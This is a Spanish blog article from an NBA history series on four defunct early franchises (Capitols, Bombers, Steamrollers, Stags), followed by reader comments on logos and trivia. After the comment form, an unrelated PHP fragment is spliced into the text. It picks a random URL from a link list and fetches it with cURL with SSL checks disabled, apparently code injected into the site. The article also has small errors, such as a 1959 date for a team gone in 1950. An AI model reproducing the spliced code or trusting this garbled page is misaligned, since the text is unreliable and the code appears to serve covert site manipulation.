“Se me olvidó que te olvidé…” (I)

09 de February de 2010 por Sergio
Artículo 2 de 9 de la serie Historia de la NBA

Muchos de nosotros podríamos nombrar, sin pensar mucho, a la gran mayoría de equipos que forma actualmente la NBA. Muchos de ellos son de reciente formación (Bobcats) o son herederos de otras grandes franquicias históricas (Thunder-Supersonics). Cuando hablamos de equipos como los Lakers, Pistons, Hawks, 76ers o Kings tendemos a creer que forman parte de la liga desde sus inicios. En realidad, estos equipos entraron a formar parte de la competición cuando esta ya comenzaba a tomar forma y existen otros muchos que, siendo precursores y en algunos casos fundadores, no se recuerdan a pesar de que sus logros no distan mucho de franquicias con mucha más solera. Los 3 siguientes artículos tratan sobre todas esas franquicias que han ido aportando a lo largo del tiempo su granito de arena para acabar consiguiendo este magnífico espectáculo del que todos disfrutamos hoy en día. Haremos un repaso cronológico sobre ellas en función de su fecha de fundación y méritos deportivos. A efectos prácticos los Supersonics sólo desplazaron su personal y patrimonio a la ciudad de Oklahoma por lo que no se tiene en cuenta como equipo desaparecido sino como reconvertido al estilo Syracuse Nationals – Philadelphia 76ers. Más adelante os hablaré de los equipos desaparecidos de la ABA.

1. WASHINGTON CAPITOLS:

Probablemente sea el equipo que más méritos realizó durante su corta vida en la liga. Formaron parte de la competición desde la temporada inaugural 1946-47 hasta la 50-51. Durante esas 5 temporadas, la franquicia de la capital americana obtuvo un balance de 157 victorias por 114 derrotas y 4 apariciones en la postemporada a las que hay que unir 2 títulos de división. Quizás sorprenda menos si decimos que estuvieron entrenados durante sus 3 primeras temporadas por el mítico Red Auerbach. El momento de mayor gloria vino en la temporada 48-49 en la que lograron llegar a las finales de la BAA (último año por la que sería conocida por esas siglas) tras derrotar a Philadelphia Warriors (2-0) y New York Knicks (2-1). Esa temporada, por desgracia, no pudo ser refrendada con la consecución del título ya que se vieron derrotados por el todopoderoso George Mikan y sus Lakers en 6 partidos (4-2). Es significativo el hecho de que su mayor anotador, Bob Feerick, no pudiese jugar más que unos minutos durante los Playoffs de esa temporada debido a una lesión. Su pabellon era el Unline Arena de Washington con una capacidad de 7.050 espectadores. La historia de la franquicia llegó a su fin un 9 de enero de 1951. El baloncesto no volvería a la ciudad de la Casa Blanca hasta 1973 de la mano de los Washington Bullets.

Curiosidades:

– Sus colores eran el verde y el blanco (parece que no le  dieron tanta suerte como a otros que yo me sé…).
– Aún mantiene uno de los 10 mejores porcentajes de victorias durante una temporada con un 81,7 % (49-11) en la temporada inaugural.
– Esa misma temporada consiguieron una racha de 17 triunfos que no fue superada hasta el año 1969.
– Poseen el récord, aún vigente, de la racha de victorias al comienzo de temporada con 15 partidos durante la temporada 1948-49 (empatada más tarde por los Houston Rockets durante el curso 1993-94).
– Ha tenido en sus filas a dos posteriores Hall of Famers: Bill Sharman y Red Auerbach.
– Don Otten, máximo anotador del equipo en 1950, mantiene el curioso récord de más faltas personales en un partido con 8.
– Bob Feerick, máximo anotador durante las 3 primeras temporadas de vida del equipo, se convirtió en el sustituto de Auerbach en el banquillo como jugador-entrenador. A la postre, acabaría convirtiéndose en uno de los entrenadores que tuvo la suerte de dirigir a Wilt Chamberlain.

2. ST. LOUIS BOMBERS

Otra de los equipos fundadores de la BAA fueron los St. Louis Bombers. ¿St. Louis? ¿Esa ciudad dónde diablos está? St. Louis es la principal ciudad, junto a Kansas City, del estado de Missouri y es la 16ª ciudad norteamericana en cuanto a población. A pesar de que actualmente no liguemos su nombre al baloncesto (si no más bien al “Spirit of St. Louis”), fue una de las únicas 4 franquicias iniciales que perduraron durante más de 1 año tras la primera temporada oficial junto a Chicago Stags, Washington Capitols y Providence Steam Rollers. Durante esos 4 años de vida tuvo 3 apariciones en Playoffs y consiguió un título de división, un historial similar a equipos como los actuales Hornets o Timberwolves. Alcanzó durante su corta vida un 51,5 % de victorias con 122 victorias sobre 237 partidos disputados. Este equipo tiene el privilegio de haber disputado el primer partido de la nueva liga NBA, renombrada a partir de la fusión con la NBL, jugando contra los Tri-Cities Blackhawks y alcanzando la victoria por 72-51 en un partido disputado el 1 de Noviembre de 1949. Disputaban sus partidos en el St. Louis Arena, también conocido como Checkerdome, con una capacidad de 20.000 espectadores. Este mismo escenario fue el hogar del equipo local de hockey hasta bien entrados los años 90. El equipo acabó desapareciendo tras la disputa de la temporada correspondiente al año 1950 donde finalmente no consiguió alcanzar la postemporada.

Curiosidades:

– Por su plantel pasaron posteriores Hall of Famers como Ed Macauley y Ken Loeffler, este último como entrenador.
– Los colores de su equipación eran el rojo y el blanco.

3. PROVIDENCE STEAMROLLERS

Las apisonadoras de Providence fueron la 4ª franquicia que, estando incluida en la temporada original de la BAA, perduró mas allá del final de la misma. Esta franquicia es la última entidad deportiva con sede en Rhode Island dentro de las cuatro grandes competiciones que se desarrollan históricamente en EEUU (hockey, fútbol americano, béisbol y baloncesto). Su propietario era Lou Pieri, dueño a su vez del escenario en el que disputaban sus partidos como locales, el Providence Arena. Tras tres temporadas y unos decepcionantes resultados de 46 victorias por 122 derrotas decidieron abandonar la competición y disolver la sociedad deportiva. La fecha en la que dejaron la competición, un 3 de Agosto de 1949, fue la misma fecha en la que la NBL y la BAA decidieron unirse para crear la NBA.

Curiosidades:

– Los Providence Steamrollers tiene el más que dudoso honor de ser la franquicia que menos victorias ha conseguido durante una temporada completa con 6. Sin embargo, no es el porcentaje más bajo de victorias, marca que ostentan los Philadelphia 76ers de la 1972-73.
– Nat Hickey, durante la temporada 1947-48, se convirtió en el jugador de mayor edad que disputaba un encuentro de la liga profesional con 46 años, record aún vigente.
– Los Steamrollers perdieron el primer partido disputado el Día  de Navidad frente a los New York Knicks en el MSG en 1947.
– George Nostrand fue el jugador más alto que jugó en la BAA con 2’04 centímetros. Su imagen fue la escogida para realizar el cartel correspondiente a la publicidad del primer partido disputado en la BAA (Huskies-Knicks).
– Ernie Calverley fue el primer líder en asistencias de la liga y fue incluido en el segundo equipo ideal en la temporada inaugural.
– Los colores de su equipacion eran el rojo, blanco y negro.

4. CHICAGO STAGS

El primer equipo profesional de Chicago, y por tanto precursor de los actuales Bulls, inició su andadura de la mano de la BAA formando parte de la primera lista de 11 equipos participantes en la temporada 46-47. Esta franquicia ostenta el privilegio de ser uno de los dos primeros finalistas de la NBA, perdiendo la ronda final de las eliminatorias frente a los Philadelphia Warriors por 4-1. De todos los equipos desaparecidos durante la historia este es el que mejor porcentaje de victorias acumuló con un total de 145 sobre 237 partidos (61.2 %). Todos los años en los que comenzó la temporada acabo disputando los Playoffs, aparte de haber conseguido un título de división. La sede donde el equipo recibía a sus contrincantes era el Chicago Stadium, hogar a su vez de los Bulls hasta 1994 y, por tanto, testigo del primer threepeat de dicha franquicia comandada por un tal Jordan. Tenía un aforo que rondaba los 17.000 espectadores. A pesar de sus notables logros, la franquicia desapareció en 1950, habiéndole dado tiempo a disputar la primera temporada de la historia con 3 divisiones. Recientemente los Bulls realizaron un homenaje a esta historica institución vistiendo una versión del uniforme con el que disputaban los encuentros los jugadores de los Stags.

Curiosidades:

– La vestimenta de los jugadores concordaba en sus colores con la bandera norteamericana: blanco, azul y rojo.
– El mejor jugador de su corta historia fue Max Zaslofsky, jugador de ascendencia hebrea famoso por su manera de tirar en la que empleaba ambas manos, una técnica “poco ortodoxa” hoy en dia pero que no impidió que se convirtiera en el máximo anotador de su equipo y con mejores porcentajes que el resto de sus compañeros. También fue protagonista por ser elegido para el primer equipo ideal de la BAA en 1947. De hecho consiguió este logro a los 21 años, récord que ha estado vigente durante 40 años hasta que LeBron James lo ha roto recientemente.
– En esta franquicia jugó el hermano menor del famoso George Mikan, Ed Mikan.
– Como hemos comentado en los Trivials de la página, los Chicago Stags consiguieron los derechos de Bob Cousy de parte de los Hawks pero su desaparición ese año de 1959 originó un draft en el que el resto de equipos se repartieron el plantel del equipo de Illinois. Como bien sabéis su destino fue Boston, donde se convirtió en uno de los mas grandes jugadores de la historia.
– Esa última temporada, Andy Phillip se proclamó como mejor asistente de la liga, hecho que repetiría los dos años posteriores, ya en los Warriors, llegando a alcanzar una nada despreciable marca de 8,2 asistencias por partido en aquella época.

Comenta

16 comentarios a esta entrada

  1. sayim dice:
    #1

    Mi mas sincera enhorabueno por esta serie de artículos que has iniciado Sergio. Estupenda redacción, totalmente documentado y con una lectura facilisima. Lo dicho, sigue así y gracias por tus esfuerzos

    Un saludo a todo el blog

      Citar

  2. TheDeerHunter dice:
    #2

    Juer… hay algo que tienen en común las 4 franquicias: un logo horrendo del tó (sobre todo el del ciervo, que da miedito)
    Quizás el que menos me desagrada es el de los “apisonadoras”. El nombre tampoco está mal ¿no??

    Bill Sharman también es uno de esos jugadores del que deberíamos hacer un artículo, también Ed Mcauley… y el tal Max Zalofsky, que se está convirtiendo en célebre en este blog.

    Gran artículo. Gran serie.

      Citar

  3. Hynreck dice:
    #3

    Grande Sergio

    La verdad que sosos y que cansinos son (casi) todos los equipos americanos con su dichosa banderita al diseñar sus vestimentas, rojo, blanco y azul, rojo, blanco y azul…

      Citar

  4. Dantley2 dice:
    #4

    Me sonaban los Capitols, pero del resto ni idea.

    Te lanzo una pregunta, Sergio, ¿cuántos de los 30 equipos actuales sobreviven desde los inicios?

      Citar

  5. scalaxx dice:
    #5

    Creo que hay 4: Lakers, Celtics, 76ers y Warriors. En el caso de los 2 últimos, cambiaron sus nombres varias veces. El resto han nacido de 1950 en adelante si no me equivoco, y dudo de si los Hawks también se mantuvieron desde sus inicios (St. Louis Hawks con el legendario Bop Pettit).

      Citar

  6. sergio dice:
    #6

    Muchas gracias a todos en primer lugar.

    Dantley, si te refieres a la BAA… 3: New York Knicks, Boston Celtics y Philadelphia Warriors (Golden State actuales) Y lo de los Capitols es porque existen equipos con el mismo nombre en el resto de ligas americanas quiza. Es un nombre con mucha historia… como los Celtics, de los que os hablare en un futuro. Me parece una de las historias mas apasionantes de las que la gente no tiene demasiada nocion.

    De la NBA hablando estrictamente quedan unos cuantos…. Por cierto que los equipos del articulo no han terminado… quedan unos 8 si no me equivoco. El gran Txus se encargara de ir sacandolos

      Citar

  7. Txusma dice:
    #7

    Las cosas buenas se hacen esperar. Aún quedan un par de artículos sobre equipos extintos y algo más en cartera. Permaneced conectados!

    La verdad es que se aprende mucho con estos artículos.

      Citar

  8. kartero dice:
    #8

    En primer lugar enhorabuena sergio por el blog y los articulos, me ha gustado mucho y desde ahora me uno a seguirte leyendo, cojonudo tío, lo de los Celtics apasionante, me he leido el libro de Antonio Rdguez y es la caña, vaya historias mas chulas que tiene la franquicia, os lo recomiendo a los frikis de la NBA, pero sobre todo a los fans de los Celtics, imprescindible.

      Citar

  9. Noelinho dice:
    #9

    Me quito el sombrero ante los últimos artículos publicados. Son extraordinariamente interesantes, seguid así! 🙂

      Citar

  10. Sancho dice:
    #10

    simplemente una entrada excelente. sois geniales en esta pagina.

    x cierto, alguien me puede decir xk el otro dia los Hornets jugaron contra Charlotte con una camiseta que horrorosa q ponia NOLA? era verde x detras y azul x delante y con franjas ahi arco iris.. uff, lamentable. alguien sabe xk es?

      Citar

  11. Txusma dice:
    #11

    NOLA significa New Orleans Luisiana. Lo de los colores espero que sea algo temporal pq daña la vista.

      Citar

  12. Love Denise dice:
    #12

    Felicidades por el aticulo Sergio, datos desconocidos para mí los que has aportado.
    Pues a mi el logo del ciervo me ha gustado, más feo es el de los Heat y el de los Lakers con esos balones tan sosos.

      Citar

  13. TheDeerHunter dice:
    #13

    Hombre… visto así, quizás no sería mala idea revisar algunos logos de algunos equipos. Se ve más de uno bastante “ochentero”
    El de los Lakers supongo que me gusta más por costumbre que por otra cosa… pero algún concepto más moderno y que conservara el espíritu no lo vería con malos ojos.

    Pero volviendo al ciervo… por dios, si le dejo a mi sobrino un rotulador y te monta un ciervo mucho más flipante que ese. Si parece que va fumao!!!

      Citar

  14. TheDeerHunter dice:
    #14

    y eso sin entrar en el nombrecito “stags”… que suena a escupitajo

      Citar

  15. Love Denise dice:
    #15

    Pues a mi me ha molao el ciervo, estoy pensando en tatuarmelo en el culo, el de los bomberos de St Louis es horrible, y el de los Rockets o los Pacers son deplorables. Los mejores para mí, a parte de el de los Stags, los de los Bucks, Wolves, Hawks, Warriors…. y el de los Cantabria Lobos.

      Citar

  16. kantonyo dice:
    #16

    El logo del ciervo se parece un monton al de los Bucks actual.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>